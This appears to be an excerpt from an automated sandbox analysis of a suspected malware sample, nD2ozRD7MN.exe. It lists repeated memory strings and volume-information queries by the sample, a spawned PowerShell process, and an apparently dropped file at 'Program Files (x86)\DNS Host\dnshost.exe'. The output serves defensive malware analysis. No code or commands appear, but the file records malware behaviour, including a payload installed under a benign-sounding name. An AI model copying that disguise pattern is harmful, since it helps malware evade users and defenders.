Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.00000000038E0000.00000004.00000800.00020000.00000000.sdmp, nD2ozRD7MN.exe, 00000005.00000002.3543198585.00000000038A9000.00000004.00000800.00020000.00000000.sdmp, nD2ozRD7MN.exe, 00000005.00000002.3543198585.000000000395A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerlBeq
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.0000000003614000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLReqx
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.00000000038E0000.00000004.00000800.00020000.00000000.sdmp, nD2ozRD7MN.exe, 00000005.00000002.3543198585.00000000036D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLReqP*
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.00000000038A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLReqhx
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.0000000003614000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managerm
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.0000000003526000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLReq<
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.00000000036D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLReq@
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.00000000038E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLReqX
Source: nD2ozRD7MN.exe, 00000005.00000002.3557721308.000000000784C000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Program ManagerX
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.00000000038A9000.00000004.00000800.00020000.00000000.sdmp, nD2ozRD7MN.exe, 00000005.00000002.3543198585.000000000395A000.00000004.00000800.00020000.00000000.sdmp, nD2ozRD7MN.exe, 00000005.00000002.3543198585.00000000037A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLReq$
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.00000000037A7000.00000004.00000800.00020000.00000000.sdmp, nD2ozRD7MN.exe, 00000005.00000002.3543198585.0000000003656000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLReqd
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.000000000395A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLReq(
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.00000000039CE000.00000004.00000800.00020000.00000000.sdmp, nD2ozRD7MN.exe, 00000005.00000002.3543198585.0000000003590000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLReq,
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.0000000003656000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLReql
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.00000000037A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLReq0
Source: nD2ozRD7MN.exe, 00000005.00000002.3556656955.0000000006C7D000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Program ManagerH
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.000000000395A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLReqT
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.00000000037A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLReq\Q
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.000000000357C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLReq}X
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.0000000003614000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLReqX
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.00000000037A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLReq\L
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.00000000037A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLReq\
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.00000000038C5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLReq4h
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.00000000037A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLReq4(
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.00000000038A9000.00000004.00000800.00020000.00000000.sdmp, nD2ozRD7MN.exe, 00000005.00000002.3543198585.00000000039CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLReq`
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.00000000037A7000.00000004.00000800.00020000.00000000.sdmp, nD2ozRD7MN.exe, 00000005.00000002.3543198585.0000000003614000.00000004.00000800.00020000.00000000.sdmp, nD2ozRD7MN.exe, 00000005.00000002.3543198585.00000000036D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLReq
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.00000000038E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager8
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.00000000037A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLReqD
Source: nD2ozRD7MN.exe, 00000005.00000002.3557295916.0000000007579000.00000004.00000010.00020000.00000000.sdmp, nD2ozRD7MN.exe, 00000005.00000002.3559273017.0000000007CBC000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Program ManagerManager
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.0000000003614000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLReqH
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.00000000037A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLReq0Z
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.0000000003656000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLReqL
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.00000000036D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLReqxDw
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.00000000036D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLReqhfo
Source: nD2ozRD7MN.exe, 00000005.00000002.3555885087.0000000006A7C000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Program Manager\|
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.00000000037A7000.00000004.00000800.00020000.00000000.sdmp, nD2ozRD7MN.exe, 00000005.00000002.3543198585.000000000393A000.00000004.00000800.00020000.00000000.sdmp, nD2ozRD7MN.exe, 00000005.00000002.3543198585.0000000003656000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLReqP

Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Queries volume information: C:\Users\user\Desktop\nD2ozRD7MN.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Queries volume information: C:\Users\user\Desktop\nD2ozRD7MN.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Queries volume information: C:\Users\user\Desktop\nD2ozRD7MN.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Queries volume information: C:\Users\user\Desktop\nD2ozRD7MN.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Queries volume information: C:\Program Files (x86)\DNS Host\dnshost.exe VolumeInformation
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
